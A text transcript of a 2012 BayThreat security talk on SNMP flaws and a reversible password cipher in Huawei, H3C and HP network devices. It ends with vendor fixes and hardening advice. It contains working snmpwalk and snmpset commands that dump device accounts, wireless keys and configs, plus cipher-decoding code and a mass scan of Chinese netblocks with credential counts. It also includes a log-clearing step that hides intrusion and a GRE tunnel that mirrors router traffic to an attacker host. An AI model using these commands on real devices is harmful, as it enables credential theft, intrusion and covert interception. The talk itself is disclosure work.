a country's honerable n3twork devices
DESCRIPTION
A discussion on the weaknesses of SNMP and the password cipher used in Huawei and HP/H3C devices. Presented at BayThreat 3 (2012) on December 7, 2012.TRANSCRIPT
A CouNtry's Honorable n3twork deviCes
Bay Threat 2012 @grutz
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes
BACKGROUND
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 2
Disclaimer
Any content or opinion stated herein is that of myself and not of my employer. The informaGon is being provided “as-‐is” and as a convenience, for informaGonal purposes only. Any resemblance to real persons, living or dead, is purely coincidental. No warranty is expressed or implied. Not responsible for direct, indirect, incidental or consequenGal damages resulGng from any defect, error or failure to perform. For recreaGonal use only. May be too intense for some viewers.
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 3
POLITICS!
This presentaGon does not care about the poli%cs between China, the US and any companies Data is presented to show the pervasive risk these new vulnerabiliGes create China was only used because they have the largest install base of Huawei and H3C equipment available via the Internet!
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 4
About @grutz….
PenetraGon tester In the business of breaking into businesses business business
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 5
The Huawei/H3C/HP Timeline
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 6
Huawei-‐3Com Partnership
2006
H3C is born! May 7, 2007
Bain Capital / Huawei / 3Com deal Sep 28, 2007
US Gov’t Smackdown
2008
HP Acquires H3C
April 12, 2010
US Gov’t Huawei/ZTE Smackdown Oct 8, 2012
Huawei != H3C
...except when they are (so`ware) Since the creaGon of H3C by Huawei-‐3Com the two companies diverged their product lines. Yet they sGll shared a very similar code origin (and bugs!) VulnerabiliGes described here and in FX’s talk can generally affect Huawei devices in the Huawei-‐3Com years (2006-‐2010) and all H3C devices BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 7
FX’s Huawei DEFCON Bomb
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 8
Huawei’s July 31, 2012 Response to c|net
hfp://news.cnet.com/8301-‐1009_3-‐57482813-‐83/expert-‐huawei-‐routers-‐are-‐riddled-‐with-‐vulnerabiliGes/
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 9
LETS TALK BIG BANG
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 10
Overflows are cool…
…but they’re finicky lifle beasts Huawei/H3C not as bad as Cisco IOS but, sGll.. How many Gmes have you used an IOS buffer overflow?
No, really… Be serious here!
Now how many Gmes have you used SNMP to download device configs? Which would you rely upon for network penetraGon?
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 11
h3c (old) vs hh3c (new) For a node in the H3C new-style MIB files, its name starts with hh3c, and its OID starts with 1.3.6.1.4.1.25506; for a node in the H3C compatible-style MIB files, its name starts with h3c, and its OID starts with 1.3.6.1.4.1.2011.10. For example, node hh3cCfgOperateType with the OID of 1.3.6.1.4.1.25506.2.4.1.2.4.1.2 is in file hh3c-config-man.mib, and node h3cCfgOperateType with the OID of 1.3.6.1.4.1.2011.10.2.4.1.2.4.1.2 is in file h3c-config-man.mib. Both of the two nodes indicate the same variable in the agent, but they are in different MIB style. By default, devices use H3C new-style MIB files; http://www.h3c.com/portal/Products___Solutions/Technology/System_Management/Configuration_Example/200912/656452_57_0.htm#_Toc247357228
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 12
(T)FTP File Transfers: hh3c-‐config-‐man
Funcaon OID Operator
OperaGon type 1.3.6.1.4.1.25506.2.4.1.2.4.1.2.xx 1 – running2Startup 2 – startup2Running 3 – running2Net 4 – net2Running 5 – net2Startup 6 – startup2Net
Protocol 1.3.6.1.4.1.25506.2.4.1.2.4.1.3.xx 1 – `p 2 – qtp 3 – cluster`p 4 – clusterqtp
Filename 1.3.6.1.4.1.25506.2.4.1.2.4.1.4.xx filename
DesGnaGon IP Address 1.3.6.1.4.1.25506.2.4.1.2.4.1.5.xx IpAddress
Username 1.3.6.1.4.1.25506.2.4.1.2.4.1.6.xx FTP Username
Password 1.3.6.1.4.1.25506.2.4.1.2.4.1.7.xx FTP Password
RowStatus 1.3.6.1.4.1.25506.2.4.1.2.4.1.9.xx 4 – go go go move move move!
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 13
hh3c-‐config-‐man caveats
Support it spofy between device types Mostly routers and switches work H3C ERxxxx Series: OpType = 1 (system2net)
Downloads are logged Requires Read/Write community string Buggy!
Manual “snmpset” worked some of the Gme Metasploit module worked some of the Gme
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 14
hfps://github.com/grutz/h3c-‐pt-‐tools/blob/master/hh3c-‐snmpdl.sh
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 15
Let’s script…
HP/H3C, SNMP, LOCAL ACCOUNTS AND YOU!
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 16
Usernames and Passwords in SNMP? Never!
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 17
Huawei/H3C Password Encrypaon Types
(h)h3cAuthMode designates encrypGon storage type: 0: No encrypGon 3: Ciphertext “encrypGon” 7-‐CZB#/YX]KQ=^Q`MAF4<1!! 9: SHA-‐256 encrypGon $key$hash_digest_value (Since 2007, Mostly AR devices)
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 18
hh3cUserLevel / hh3cUserState
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 19
RFC-‐1902: SMI for SNMPv2
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 20
What is MAX-‐ACCESS and read-‐create?
…so it’s protected, right?
Sure it is! Unless you know the SNMP READ ONLY string… This was probably a bug… or a misunderstanding…
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 21
Lets glob some users!
$ snmpwalk –c public –v 1 <host> \ 1.3.6.1.4.1.2011.10.2.12.1.1.1 Walks the locally defined list of users: local user <username>
password <clear|cipher|sha256> <value>
level [0|1|2|3]
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 22
Let’s Weaponize it!
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 23
Other SNMP goodies…
(h)h3c-‐dot11-‐cfg – (requires R/W access) SSID / PSKs
snmpwalk –v 1 –c private ip-address 1.3.6.1.4.1.2011.10.2.75
(h)h3c-‐ssh -‐ (requires R/W access)
SSH Server disabled? Enable it! snmpset –v 1 –c private ip-address 1.3.6.1.4.1.25506.2.22.1.1.1.7 i 1
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 24
Strap In and Let’s Scan China!
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 25
INCONCEIVABLE!
hfp://www.okean.com/chinacidr.txt 2,444 netblocks 290,118,656 hosts Only care about SNMP
Onesixtyone to the rescue! Originally by Solar Eclipse Updated in 2011 by Paul Flo Williams: hfps://github.com/hisdeedsaredust/onesixtyone
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 26
For best results use a VPS/host from a country China trusts
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 27
L33t b@$h sk1ddy
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 28
Huawei / H3C, 117,033
ZTE, 64,579
Cisco, 11,278
Juniper, 273 vxWorks, 8,121
Huawei / H3C, 88,517
ZTE, 33,669
Cisco, 2,475 Juniper, 99
-‐20,000
0
20,000
40,000
60,000
80,000
100,000
120,000
140,000
SNMP R/O
SNMP R/W
Source: Personal scan of China Netblock ranges using SNMP strings “public”, “private”, “h3c”, “china” and “telecom”
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 29
China Network Device Counts (Oct 2012)
Compare H3C results from ShodanHQ
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 30
(h)h3c-‐user Results
Devices with locally defined accounts: 15,588 Devices with ciphered passwords: 5,132 Devices with cleartext passwords: 15,263 Total accounts/passwords: 33,938 Unique passwords: 3,898 Username == Password: 2,101 Unique version strings: 686 A majority of cleartext-‐only passwords were from one Telecom company.
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 31
What Type of Accounts are these?
Local users can be used for: Remote management access (telnet, ssh, web) VPN access
In most cases telnet, ssh and hfp were open on devices with locally defined accounts.
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 32
Device type breakdown
Huawei/H3C VRP: 2,293 SecPath/SecBlade Firewalls: 464 WA2xxx Access Points: 2,771 Huawei Quidway: 3,205
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 33
SO ABOUT THAT CIPHER…
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 34
Huawei/H3C Not Unique In This
Weak and reversible ciphers seem to be a standard for all Networking companies at one Gme:
Cisco Type 7 Vinegere cipher Juniper $9$
Generally these are used because some protocols need to use cleartext passwords yet these should not be stored in the clear. So….why not ROT13? Just as secure…….
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 35
Cipher Examples
CLEARTEXT CIPHER
a D(HD%5.*MN;Q=^Q`MAF4<1!!
aa P+J^5@ZGG[3Q=^Q`MAF4<1!!
aaa +Q4Z3D_*-‐N[Q=^Q`MAF4<1!!
123 7-‐CZB#/YX]KQ=^Q`MAF4<1!!
aaaa EHHC8L%9.F3Q=^Q`MAF4<1!!
aaaaa X`9:NJ_A#$WQ=^Q`MAF4<1!!
aaaaaa B.7)"^_<OGCQ=^Q`MAF4<1!!
huawei N`C55QK<`=/Q=^Q`MAF4<1!!
aaaaaaaa 2P;JH_C3'+_Q=^Q`MAF4<1!!
aaaaaaaaaaaaaaaaaaaa 2P;JH_C3'+^'^KG@[*)9LZ*ZYF[R'$:5M(0=0\)*5WWQ=^Q`MAF4<<"TX$_S#6.NM(0=0\)*5WWQ=^Q`MAF4<1!!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
2P;JH_C3'+^'^KG@[*)9LU<WK:`IEBCP2P;JH_C3'+_Q=^Q`MAF4<<"TX$_S#6.NM(0=0\)*5WWQ=^Q`MAF4<1!!
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 36
Want more examples? jfgi!
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 37
This means something…
Ciphers are 24 or 88 chars in length ‘!!’ at the end of everything
Base64 rotaGonal? Good idea, but no… didn’t pan out.
Consistent last few bytes of data:
Q=^Q`MAF4<1!! Consistent first 10 bytes (2P;JH_C3’+) when the cleartext is => 8 characters
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 38
Probably using a block-‐based cipher
IdenGcal plaintext blocks encrypt to idenGcal cipher blocks:
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 39
Binary/ASCII Encoding
Let’s assume DES-‐EBC: Probably a staGc key Input = cleartext + null padding
Output = binary data Binary result converted to printable ASCII ASCII NOT Base64 but similar (4 chars to 3 bytes) A consistent cipher string length based on source length means we’re probably correct. BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 40
Lets decode to binary! result = bytearray() chkval = ord('a') cipher_loc = 0 # converter works in groups of 4 until # cipherlen is reached for cnt in range(0, cipherlen, 4):
# group 1 cv1 = ord(cipher[cipher_loc]) if cv1 == chkval: cv1 = ord('?')
# group 2 cv2 = cv1-‐33 cipher_loc += 1 cv1 = ord(cipher[cipher_loc]) if cv1 != chkval: cv2 = cv2 << 6 else: cv1 = ord('?') # group 3 cv1 = cv1-‐33 cv2 = cv2 | cv1 cipher_loc += 1
cv1 = ord(cipher[cipher_loc]) if cv1 != chkval: cv2 = cv2 << 6 else: cv1 = ord('?') # group 4 cv1 = cv1-‐33 cv2 = cv2 | cv1 cipher_loc += 1 cv1 = ord(cipher[cipher_loc]) if cv1 != chkval: cv2 = cv2 << 6 else: cv1 = ord('?') # output cv1 = cv1-‐33 cv2 = cv2 | cv1 cipher_loc += 1 result.append((cv2 & 0xff0000) >> 16) result.append((cv2 & 0xff00) >> 8) result.append(cv2 & 0xff)
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 41
Huawei’s Soluaon
Use AES-‐256 and updated so`ware for SNMP Yes.. AES-‐256.. A symmetric cipher. hfp://support.huawei.com/enterprise/ReadLatestNewsAcGon.acGon?contentId=NEWS1000001141
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 42
HP/H3C’s Soluaon
Use SHA-‐256 on those systems that support it Upgrade your code for the SNMP fix. hfps://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-‐c03515685
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 43
So about this SHA-‐256…
Yeah, salted SHA-‐256. Not reversible but crackable! h3c:$eoaM56nX$ff570abf74e0f5e24b1b6d7438bf9260f2c402934985bf694412cf45dc2e34f5 pw:$8fRj3Ju.$f54c881eb4099465ef619dd3993a63fa8993cd24a45f424d101c293734531878
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 44
NOW WHAT?
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 45
Things to watch out for
All commands are logged locally > reset logbuffer
Keyboard keys are very annoying
Backspace is not backspace, unless it’s ^H
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 46
See All Packets!!! <rtr1> system-view [rtr-1] interface tunnel 1/0/1
[rtr-1-Tunnel1/0/1] ip address 10.10.10.1 255.255.255.0
[rtr-1-Tunnel1/0/1] tunnel-protocol gre
[rtr-1-Tunnel1/0/1] source 10.10.1.1
[rtr-1-Tunnel1/0/1] destination 192.168.1.1
[rtr-1-Tunnel1/0/1] quit
[rtr-1] ip route-static 192.168.2.1 255.255.255.0 tunnel 1/0/1
linux# modprobe ip_gre
linux# ip tunnel add gre0 mode gre remote 10.10.1.1 local 192.168.1.1 ttl 255 linux# ip link set gre0 up
Linux# ip addr add 10.10.10.2/24 dev gre0
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 47
PROTECT YOURSELF
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 48
Be protected.. Be be protected!
Don't configure local accounts, use RADIUS or TACACS+ Don't configure SNMPv1 Don't use default SNMP strings Disable the snmp view for (h)h3c-‐user:
snmp-‐agent mib-‐view excluded 1.3.6.1.4.1.2011.10.2.12.1.1.1 snmp-‐agent mib-‐view excluded 1.3.6.1.4.1.25506.2.12.1.1.1
Use SHA256 passwords if your image supports it
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 49
QUESTIONS?
hfp://github.com/grutz/h3c-‐pt-‐tools/ hfp://grutztopia.jingojango.net/ Thanks to #metasploit, hdm, FX, eMaze (Ivan and Roberto), HP/H3C and Huawei IRTs, US-‐CERT and others whom I may have forgofen
BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 50